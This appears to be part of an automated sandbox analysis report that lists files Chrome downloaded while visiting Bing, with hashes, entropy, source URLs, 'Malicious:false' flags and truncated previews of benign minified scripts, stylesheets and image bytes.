                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P.."................................................L...Th...>.....z.l_.[..=.J.=.:....2..z.JzWM.....=.#.............................................%......y.w...1.|....?...........................!1"AQRc#b.... T..23BC....DSdq.............?.....t.V....n..n..n..n..n..n..n..n..^..j2....~&..=.*..\.j.;..!...Y{q],i..B.O*.o...v.=..$..qI..7lm..H`oU.....[..(:..'..pO..{y.e.OdG..R..<.X0$...2z...M`[u...d]%.\3..j....ca.......f.H.PhN..hl}7q...{...V..H.A..qH./..%p....F....t.?...GC.^.\..'B.H......n..[.|V...tmR)@m...s.r..[.A.3......J........e.....|r.X..9..I..X........JDm`.n.....NN0y..A.6.......?...so..j.\....@.?.....].^.{^<.........0..FF.<...+..!.!..&.`.Y:...SCk.`...........)8.>.eA....A\v...]...|........;j._....|.........q:...CPX+.....k.O.B.9...<+.O..S.T..<+.O.......3.HS...;{..!.aO....g.mm..-a.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (22037)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):22068
                                                                                                    Entropy (8bit):5.358666618759019
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Kh4kT1lYxfqyDOkKMpWMEQNhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0wzuer:Y5TifhLbBpBnqIH+Z6sepXv0uQaV
                                                                                                    MD5:DDD23E100A6474A6E64856960BF087EE
                                                                                                    SHA1:719A7078B66F5211032106665C77FAF7EDA99BDA
                                                                                                    SHA-256:78AA31D0B825A124C7CA14F4FE049560D1BDD186E8CDD7785BE87C1D005384E4
                                                                                                    SHA-512:C92BB45C0C4367D2A92B75BBFAE381372A1CB9ED77EE66C4D8DF7537EB88768A7A835F637D3B7556EC43026B88C9B3A6DB4C5B57B9D68E8D446554B5FAAE0277
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/cZpweLZvUhEDIQZmXHf69-2pm9o.js
                                                                                                    Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:14e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:10}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u);wt(e)}func
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65522), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):71742
                                                                                                    Entropy (8bit):5.277506917689889
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:kde0TbABO50ORdcE2J1Et7vxBzcJnlOkcvwjuDF8B2SJpgp7Fer+3xQi9tlh93lq:Wc5l/jZPTeQ633t13O3xAOn88HFTH19
                                                                                                    MD5:86812D7819DF69824CCA82F9B8777569
                                                                                                    SHA1:E5777AA2821AE8DD81BFF80E7B508BB350E4F80F
                                                                                                    SHA-256:52C1FD3CBE9324FFA8DF105F5D126712F5A9FBE324C6A8B5A27993F8609DD0FA
                                                                                                    SHA-512:0E875D151AC464D2E98FF55482EB64029E5787DB7E5E014D95799944523BEF13FA9660156C5DFAB71A534FF1B27B53BDB3778F7FB3553FBF6C70A6E5D054BB8E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:define("Types/SuggestionTypes",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});t.SuggestionExpansionType=void 0;var i;(function(n){n[n.NO_EXPANSION=0]="NO_EXPANSION";n[n.REQUERY_EXPANSION=1]="REQUERY_EXPANSION";n[n.ZIS_EXPANSION=2]="ZIS_EXPANSION";n[n.QF_EXPANSION=3]="QF_EXPANSION"})(i=t.SuggestionExpansionType||(t.SuggestionExpansionType={}))});define("Types/CoreTypes",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0})});define("Utilities/SuggestionUtilities",["require","exports"],function(n,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});t.combinePSCSuggestions=t.storePSCSuggestions=t.updateCvidInSuggestion=t.escapeHTML=t.processSuggestionResponse=t.setPanelValue=t.createSuggestionBlock=t.isUserSignedIn=t.hasHistorySuggestion=t.onClickHandler=t.updateSearchBoxValueOnHover=t.getNextSelectedSuggestion=t.getHValueFromId=t.convertHighlightedQueryToPlainQuery=t.convertHighligh
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):41572
                                                                                                    Entropy (8bit):7.881530849843299
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:FlDXLaMHUbra8omv3ZYL2ZlcB1xSXcqObja/dUUbe8k:rXHH+Goa2Zlc1Obk
                                                                                                    MD5:3051C1E179D84292D3F84A1A0A112C80
                                                                                                    SHA1:C11A63236373ABFE574F2935A0E7024688B71CCB
                                                                                                    SHA-256:992CBDC768319CBD64C1EC740134DECCBB990D29D7DCCD5ECD5C49672FA98EA3
                                                                                                    SHA-512:DF64E0F8C59B50BCFFB523B6EAB8FABF5F0C5C3D1ABBFC6AA4831B4F6CE008320C66121DCEDD124533867A9D5DE83C424C5E9390BF0A95C8E641AF6DE74DABFF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0
                                                                                                    Preview:.PNG........IHDR.............R.l.....gAMA......a.....pHYs..,J..,J.wztM....IDATx^....\...k....;......L"..9..F.s.9!'FQ.H1S$. ...L.D.9.@$.........sw..]..iT.Hyd.)J..<.S..S....{.Z.T.7......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18...7.......i..i~......Mx>....zo.y...KJ..m......1...?,k|........8+..g.Mx.......6=.t...Q.....7)..........~g.S>.j.St.....6|w.'uO.:]....:..>/Wk...5/HK.r..%.]...i|.q..{.-M/.r....7._y...../6}o........*.;!....a...Y....z.H..+..=...g...<+........u.R...~A..(../K[.....U..WZZ..w...W~ym.+SoL..C...........CD.fI...67>^....>T...G.g.>Q2KN.}[..|[.....Z.......ZZ.+...Hg.s.]..... .%/Jo.K.(.Yz+.'..JO.]=M._l...;._.~....Y..z....7....[....[..O...G+g.2sX...3....9.a.s.......>-.y.a...]..0..E/...Eq.<..,......{..y..1..5w&|..cT.I...z....W...aS..v.=.h_..-.J......O...O...3i...G.R..r-.[..m..:KZ......;.i..xF...d='...H.."./....D.P.."%..)C.Io..;...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (24731), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):24731
                                                                                                    Entropy (8bit):5.394076490010073
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:VT9yphkEE2GFro1BmPgFn8vceEpOZZZMm+mdm1mGmMmDmXpOYZsYHC:VT90b+9o1BmoivceEuM96IZrgafZsyC
                                                                                                    MD5:57B7873C091880676A91A3B4AF9A6F6C
                                                                                                    SHA1:318F20A931E1E8B3011C8C0CA8B3659B91EC4139
                                                                                                    SHA-256:427E1D224DDE95EAE5737792F698261A4B329499BEF26EDBC9714D96B5E12BBB
                                                                                                    SHA-512:FF0DE4691EFB882A5EAF21168E723DBAA6D03EF6148CB4752EE10E9A4C93CEFC712675D709021594728E232BB0C1DA5BD58DE4C5E3DFBE8FDF16E8BBC216ACCA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/MY8gqTHh6LMBHIwMqLNlm5HsQTk.css
                                                                                                    Preview:#sw_as .sa_sg_searchicon{background-image:url('data:image/svg+xml,%3Csvg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18" fill="none"%3E%3Cpath class="lefticon_gray70_fill" d="M7.57895 0.710526C11.3723 0.710526 14.4474 3.78563 14.4474 7.57895C14.4474 9.21969 13.872 10.726 12.9122 11.9073L17.555 16.5502C17.8325 16.8277 17.8325 17.2775 17.555 17.555C17.3028 17.8073 16.9081 17.8302 16.6299 17.6238L16.5502 17.555L11.9073 12.9122C10.726 13.872 9.21969 14.4474 7.57895 14.4474C3.78563 14.4474 0.710526 11.3723 0.710526 7.57895C0.710526 3.78563 3.78563 0.710526 7.57895 0.710526ZM7.57895 2.13158C4.57045 2.13158 2.13158 4.57045 2.13158 7.57895C2.13158 10.5874 4.57045 13.0263 7.57895 13.0263C10.5874 13.0263 13.0263 10.5874 13.0263 7.57895C13.0263 4.57045 10.5874 2.13158 7.57895 2.13158Z" fill="%23767676"%3E%3C/path%3E%3C/svg%3E');background-repeat:no-repeat}#sw_as .sa_sg_trendingicon{background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' wid
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (807), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):807
                                                                                                    Entropy (8bit):5.1636159181057915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QwhGeo8XKomlA7sqZ1BJcn3F9x1kCAVU:s9oqKo9s+cn3TxiVU
                                                                                                    MD5:D2A0750F1255B01FCB61E1EC696A3824
                                                                                                    SHA1:CC28912310EF3128A80F2364352F516B44DA443D
                                                                                                    SHA-256:9AE661BB5617387893837A9221D8B170D3ECE93CBD896CAFDA9F498631006A44
                                                                                                    SHA-512:85E55F47AB5AD7C8F5194D9A6D6BC89A10B396B6AF61F313451082815972A9117FC52F7F93B9EC42893B6382AC0C8CB3CC3DF0C625CF95CAEB953F6D06CB15D6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/zCiRIxDvMSioDyNkNS9Ra0TaRD0.js
                                                                                                    Preview:(function(){function i(){n=IFrameOverlay;f()}function r(t){var f=sj_et(t),i=s(f,"A"),r;i&&(i.getAttribute("data-idpovrly")==="1"||u(i.href))&&!e(t)&&!o(i)&&(r="&mode=overlay",n.show([i.href,t],!0,r),sj_sp(t),sj_pd(t),sj_evt.fire("clearHover"),sj_evt.fire("idpovrlyOpen",i))}function u(n){return n&&n.toLowerCase().indexOf("view=detailv2")!=-1}function f(){SmartEvent.bind(_d,"click",r,!0,!0)}function e(n){return n&&(n.button===1||n.button===2)}function o(n){var r,i;if(n&&n.href){if(n.getAttribute("data-idpignore")=="1")return!0;if(r=n.href,r.indexOf("#CA!")>0)for(i=0;i<t.length;i++)if(r.indexOf(t[i])>0)return!0}return!1}function s(n,t){for(;n&&n!==document;n=n.parentNode)if(n.tagName===t)return n;return null}var n=null,t=["#CA!Unsave","#CA!Save","#CA!ExpandSecondaryAction","#CA!MarkAsAdult"];i()})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (371), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):4.964799787793963
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:qGD7/TMvKyYLwRMF4owANCqwvpkTzT6n0evROARDCMwzkk6Km0Msv/Gvz:JPwKVDJHCqspkZeZJDC/wKE
                                                                                                    MD5:B743465BB18A1BE636F4CBBBBD2C8080
                                                                                                    SHA1:7327BB36105925BD51B62F0297AFD0F579A0203D
                                                                                                    SHA-256:FEE47F1645BC40FBC0F98E05E8A53C4211F8081629FFDA2F785107C1F3F05235
                                                                                                    SHA-512:5592DEF225E34995F2F4E781F02CC2B489C66A7698D2FEFF9AC9A71F09E5284B6BBDB065E1DF9C06ADFB1F467D5627FBD06E647ABF4E6AB70CF34501232126AD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var SbiPrivacy;(function(){function t(){var i,r,t,u;if(typeof SbiUtil!="undefined"&&SbiUtil.rt&&_d.querySelectorAll)for(i=SbiUtil.rt.querySelectorAll(".sbiinflnk[data-link]"),r=function(t){var i=t.target;i.hasAttribute(n)&&(i.href=i.getAttribute(n),i.removeAttribute(n))},t=0;t<i.length;t++){u=i[t];SbiUtil.oncop(u,r)}}var n="data-link";t()})(SbiPrivacy||(SbiPrivacy={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):289
                                                                                                    Entropy (8bit):4.88926455834166
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:2LGXO86zKFddXQOa65Em/L6I38TcqLcUCPrWqpOlZXzPlg3X6:2QO8vzdXmMPTiAiXzC3X6
                                                                                                    MD5:9085E17B6172D9FC7B7373762C3D6E74
                                                                                                    SHA1:DAB3CA26EC7A8426F034113AFA2123EDFAA32A76
                                                                                                    SHA-256:586D8F94486A8116AF00C80A255CBA96C5D994C5864E47DEAC5A7F1AE1E24B0D
                                                                                                    SHA-512:B27B776CB4947EEF6D9E2A33B46E87796A6D4C427F4759C08CF5AA0EE410A5F12E89CA6AB9CDDD86C8471037E3C505F43C8B7FC6D8417F97F9FE3C5C47216BC4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){if("BroadcastChannel"in window){var t=1,n=new BroadcastChannel("tabCountBroadCastChannel");n.onmessage=function(i){i.data=="newTab"&&n.postMessage("existingTab");i.data=="existingTab"&&t++};n.postMessage("newTab");sb_st(function(){Log.Log("Tab","count",t.toString())},200)}})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (6526), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):6526
                                                                                                    Entropy (8bit):5.372135202911853
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:/CaRENlgVMJhPbrtwyGBdnxEd7NUCuf1bx6gqkJD:aaREXPbOLdxEd7NUnf1twI
                                                                                                    MD5:6904ABA1CE02BB3A01B6550C4BF98A7E
                                                                                                    SHA1:858127221DAF72534247D665BE661A175FAD6DD6
                                                                                                    SHA-256:4492B7EF7F9E30168D8F6410FF6928FCC3019618019116F82B25459B9267B038
                                                                                                    SHA-512:EBD259047BCDED6F925C3184A27D0D197D48B0EE3EBC2C12A27A2C9843B08C551D6DC34C299CD6E4931446F33C1D6BFF3F8CDEB018FB6C614671CF43B6497585
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/hYEnIh2vclNCR9ZlvmYaF1-tbdY.js
                                                                                                    Preview:var WebResultToolboxBlueV2;(function(){function tt(){var n=_ge("b_results"),t=_ge("b_context");(n||t)&&typeof sa_CTBConfig!="undefined"&&sa_CTBConfig&&(r[b]=ot,r[k]=l,r[d]=l,r[g]=c,r[nt]=c,sj_be(sj_b,"click",function(n){u(n)}),sj_evt.bind("onPopTR",function(n){u(n,!0)}),sj_be(sj_b,"mousedown",function(n){h(n)}),sj_be(sj_b,"mouseup",function(n){h(n)}),n&&s(n.firstChild),t&&s(t.firstChild))}function it(n){return _G.abdef_sarc!=undefined&&n.classList.contains(_G.abdef_sarc)}function s(n){n&&n.nodeType==1&&!it(n)&&(ut(n),s(n.nextSibling))}function rt(n,t,i){for(var r=-1;i--&&r++<n.length;)if(r=n.indexOf(t,r),r<0)break;return r}function ut(n){var y,u,t,c,f,s,l,a;if(n){var r=ct(sa_CTBConfig.toolboxTriggerClassName,n,"span"),h=n.getElementsByTagName("cite"),e=v(n,"u");e&&i(e,"u")[0]==="e"&&(e=null);y=sa_CTBConfig&&sa_CTBConfig.disableMetaData=="1";r&&(h.length||y)&&(u=h.length>0?h[0]:null,n.tt=r,ft(n,e)&&bt(n)&&(t=sj_ce("a"),t.href="#",t.className="trgr_icon",t.setAttribute("aria-label",sa_CT
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):128876
                                                                                                    Entropy (8bit):5.619472552990925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:KMvtMQbboZ9ZtC58i64oeolxf6DjwrgGUO7Bf7KVAvSsqAd+/vwzntPWKdwCifrE:KMvbboZ9rMadKwrgGvasZ3tPW/E
                                                                                                    MD5:DB56ED28232133AD0E3FFC1253ECAF30
                                                                                                    SHA1:51C2977AEED28BE40B0594809EFD530EEB6D3FB0
                                                                                                    SHA-256:C3900CC7C12E7417F375AD8CA56B9A0BBB389E0126601D4FF5550D5B39175ADB
                                                                                                    SHA-512:E1E4D00E257CF377C3389F1F542AADD5FADE2CCD88CCCB75723CAB6237974FF88CA5303251EE7BE85A59326DE984CDF60DA668A9C533F8CA02EABA2F9838AEAE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.1.2/js/widget.js?t=241223
                                                                                                    Preview:!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var n=t();for(var r in n)("object"==typeof exports?exports:e)[r]=n[r]}}(this,(()=>(()=>{"use strict";var e={7294:(e,t,n)=>{n.d(t,{o:()=>i});const r=JSON.parse('{"versions":{"all":"1.1.2","medallion":"1.1.2","medallion-mobile":"1.1.2"},"env":{"name":"PROD"},"apiServer":{"falconBaseUrl":"https://rewards.bing.com","snrBaseUrl":"https://bing.com"}}');class i{}i.settings=r},477:(e,t,n)=>{var r;n.d(t,{I6:()=>s,Z3:()=>o,bc:()=>a,pQ:()=>r,zL:()=>i}),n(2953),function(e){e.Medallion="medallion",e.MedallionBalance="medallion-balance",e.MedallionMedalCircled="medallion-medal-circled",e.MedallionMedalCircledAnimated="medallion-medal-circled-animated",e.MedallionMedalDailyCheckInProgress="medallion-medal-dailycheckin-progress",e.MedallionMedalDailyCheckInCompleted="medallion-medal-dailycheckin-completed",e.MedallionMedalGoalTracking="medallion-medal-g
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1598 x 899, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1236532
                                                                                                    Entropy (8bit):7.99453807364983
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:24576:3IR94Q7f3YaeokAGfdoICPLOHpob3i8/eCsjNKSOyP82Rx7BiVQFMqna:3IR9hz3OyedoZyHpyzer023BieKqa
                                                                                                    MD5:EAFC3935A3559F15248B9409658D978F
                                                                                                    SHA1:46242446924C4DB9208646689119EFACFF1C93FD
                                                                                                    SHA-256:B38F5C1FD010828E2DFC90300D3C2AB93DF49CF75C758BBBFF6B0A987D64C448
                                                                                                    SHA-512:A1F345BFA3D85C7436E5F8EC6DA3147779BC903B6E59B24732C1302AEE8366B6E60D5F3281022485E4580B22D440AF80798010E06B0E2639BEB0DBE357347B7E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...>...........x1....pHYs.................sRGB.........gAMA......a.....IDATx...W.m....1W^;.|.n..n.K...&...).Y.(.l.....a....~1l.O._...~4.`..m..!AjB.(..@R......7T<g..g...XkW..'V........s......WU .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ..D................o'bl...@ .....@ .....@ .....@ ......M....E.E<'}...r.g..Z...Ws..1.^.~.m.S_..*e..{...x.c..4/....x.{|..gA...s.g.S/.,.2..,.....UAD1...@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ..../..$-..g...."..#.....*.#.B|.5.......2........Y..M..bL=...R.g.7y.{U....q...........>.....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ......B...|].}.HO.....Y.,.x......C.....m.j.#.!....{|.=...S.{<.^.=.km.e.|Y.H...g}'......<..Mc.E..w..J..*.w....@ .....@ .....@ .....@ .....*...E...z..o..._MD.......Q..W.....@ .....@ .....@ .....@ ...^.B/......~.|].._v.g
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1729), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1729
                                                                                                    Entropy (8bit):5.072040637705228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:M9M4LYWcGoVf9zB4cdS2gIfNKoqbKPIkzrKnYAyo2jyjCKxFj81o0:2M4yG69LdSTjGbq4fufmm0
                                                                                                    MD5:A433650379BAB51BD0D50B7539E142EF
                                                                                                    SHA1:8BAAC1F4AEAFC088C227A17E5DD33939D38CC41A
                                                                                                    SHA-256:ECD739C27BD814DB96CBFB612C7854A224BAE21296AA0CFF7A5C66294CCFA203
                                                                                                    SHA-512:CCBE76C8CF0E116B12F268C003BAFC640C281D5B1EBD27BB66C21CC872E435A1395E82C061D4BD6970B6CA2E378D9BB16ACA5D932C69820D7030EBCC765E50FA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/i6rB9K6vwIjCJ6F-XdM5OdOMxBo.js
                                                                                                    Preview:var NewsAccessibility;(function(){var a="0px",h="0px",et="b_hide",ot="itm_spt",st="2.24px",t="a11y",v="tca11y",y=_ge("b_content"),c=_qs(".na_t_news_caption"),o=_qs(".itm_spt_news_caption"),i=_qs(".ans_nws"),p=i?_qs(".na_cnt",i):null,w=p?_qs(".na_cl",p):null,b=w?_qs(".b_viewport",w):null,n=b?_qs(".b_slidebar",b):null,s=n?_qs(".nws_nor",n):null,k=i?_qs(".nart_content",i):null,d=k?_qs(".nart_cl",k):null,g=d?_qs(".b_viewport",d):null,r=g?_qs(".b_slidebar",g):null,l=i?_qs(".nws_cm",i):null,nt=l?_qs(".opinion_content",l):null,tt=nt?_qs(".b_viewport",nt):null,u=tt?_qs(".b_slidebar",tt):null,it=l?_qs(".tl_cl",l):null,rt=it?_qs(".b_viewport",it):null,f=rt?_qs(".b_slidebar",rt):null,ut=i?_qs(".new_see_more_container",i):null,ft=ut?_qs(".new_see_more",ut):null,e=ft?_qs(".new_see_more_txt",ft):null;y&&(n||f||r||u||e||o)&&setInterval(function(){var i;h=(i=_w.getComputedStyle(y))===null||i===void 0?void 0:i.wordSpacing;h!==a&&(a=h,h===st?(c&&(c.style.cssText="; max-height: 100px; -webkit-line-clamp:
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1039), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1039
                                                                                                    Entropy (8bit):5.394520629964255
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:AaV1T141S2BjoljiHXdX4daXOcRWOkDqBlg:AK41PjEjiHKKwOjXg
                                                                                                    MD5:16050BAAF39976A33AC9F854D5EFDB32
                                                                                                    SHA1:94725020EFA7D3EE8FAED2B7DFFC5A4106363B5E
                                                                                                    SHA-256:039E6B3DF1D67341FB8E4A3815F0D1BB3292A2040334CEB9CFC4A8D6ABF2FB55
                                                                                                    SHA-512:CF0D54F0368FFBC6908216FD2573DF8F5FE4C34AC08E17301B8734B3FABC674672A7F456707F632F82F44B36812DAD8A0CF81A51D5CEA21EA7F0E18500298375
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/lHJQIO-n0-6PrtK33_xaQQY2O14.js
                                                                                                    Preview:var UetTag;(function(n){function t(n,t,i,r,u){var e,o,h,s,v,f,c;i===void 0&&(i="script");r===void 0&&(r="//bat.bing.com/bat.js");u===void 0&&(u="uetq");var y=n.location.search.substring(1),l=y.split("&"),a="";for(e=0;e<l.length;e++)if(o=l[e].split("="),o.length>=2&&o[0]==="form"){a=o[1];break}for(h=["MSC001","MSC002","MSC003","MSC005","MSC006","MSC007","MSC008","MSC009","MSC010","MSC011","MSC012","MSC013","MSC014","MSC015","MSC016","MSC017","MSC018","MSC019","MSC020","SP0001","SP0002","MOG001","MOG002","MOG003","MOG004","MOG005","MOG006","MOG007","MOG008","MOG009","MOG010"],s=0;s<h.length;s++)if(h[s]===a){n[u]=n[u]||[];v=function(){var t={ti:"355015334",q:null};t.q=n[u];n.UET&&(n[u]=new n.UET(t)||[]);n[u].push("pageLoad")};f=t.createElement(i);f.src=r;f.async=1;f.onload=f.onreadystatechange=function(){var n=this.readyState;n&&n!=="loaded"&&n!=="complete"||(v(),f.onload=f.onreadystatechange=null)};c=t.getElementsByTagName(i)[0];c.parentNode.insertBefore(f,c);break}}n.uetTaggingInit=t;t(
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2767), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2767
                                                                                                    Entropy (8bit):5.202622372667036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Z1qiLqvTeNvWxpFbMvAczkvZHZKc6ZDuUiXjd8Kw0D0/3xQBbmas6Wre:Z1qiLqaOxpeoZ648mDE30J
                                                                                                    MD5:904AB0DAA735504AAE493BA7168338A4
                                                                                                    SHA1:4DFDEC86B14E7F7418E3639A3E15B3023C6F6DD2
                                                                                                    SHA-256:9614EDCC490D84BFE36813C2E0707937B33D9DBC47FFA2DB58E3BECAB7F255AA
                                                                                                    SHA-512:20464BB50DC383DAB6274AE469BF3B9DADC2D8F3DB815513DF07288BF5E3430390E69621D62A4B4CC1E94E67A3167187FADB33D4CEA77436AA43A46C367A6388
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/Tf3shrFOf3QY42OaPhWzAjxvbdI.js
                                                                                                    Preview:(function(){function nt(){var r=_ge("b_results"),u;r!=null&&(u=ft(e),typeof _w!="undefined"&&u&&(sj_be(_d,e.visibilityChangedEventName,b),sj_evt.bind("ajax.unload",c)),n=r.querySelectorAll(d),rt(),sessionStorage[t]&&sessionStorage.removeItem(t),sessionStorage[i]&&sessionStorage.removeItem(i))}function tt(){var n="sschkad",t="sschvad",i;try{if(typeof Storage=="undefined"||typeof sessionStorage=="undefined"||(sessionStorage.setItem(n,t),i=sessionStorage.getItem(n),sessionStorage.removeItem(n),i!=t))return!1}catch(r){return!1}return!0}function v(n){while(n&&n.id!="b_results"){if(n.classList&&(n.classList.contains("b_algo")||n.classList.contains("sb_adTA")))return n;n=n.parentElement}return null}function s(){var e,o;if(r=y(t),u=y(i),n&&r&&u){for(f=null,e=0;e<n.length;e++)if(o=n[e],o&&r==o.getAttribute("href")&&u==e.toString()){f=v(o);break}f&&it()}}function it(){var t=document.getElementById("inline_rs"),i=_ge(l);if(!t||!i){c();h();return}n&&f&&(_w.sj_log&&sj_log("CI.RSSQB","Show","Trigger
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):434
                                                                                                    Entropy (8bit):7.14685501032372
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/78/bcE5AwwyYzMb9U5SytE2in0ECj5iBj4DM:hL5VBp9aSytHsY5dM
                                                                                                    MD5:8DD09FB0203986902F686F81583C8FDC
                                                                                                    SHA1:420D944C7582938D5FA453BD36E369CC8A6CF1BD
                                                                                                    SHA-256:CFA99C80CFABC609E9008233DED2B099C80E1DF13FF7526F1B216982DFBE757C
                                                                                                    SHA-512:9AF66CD99A0798EC94771E26C93D547B73DDCAE81CE36DED93DE1129C4C98583A39004C15E3337111FE9229DC48A7D28C2170AB91A50F9353E8778F0D25333B3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d...GIDAT8O.K.q...-.....FP.YVP8Dc.....B4......k.S.T..[K....$%u.fjX.qw...u...k...8..}...~pDcqPp..;.D*...16....H..G...;...Y........b.6M.q`Y.l.n..R1.....BS.$.........................O..W.W......r..S-.:.Uj.4.M..?...G!.Ah.4....B..8.l.R@..WP...!.^....."M....._.8p....2...o......I......K..]a..7....Z..=..98E...:./.AC.......N7.:.J.....IEND.B`.
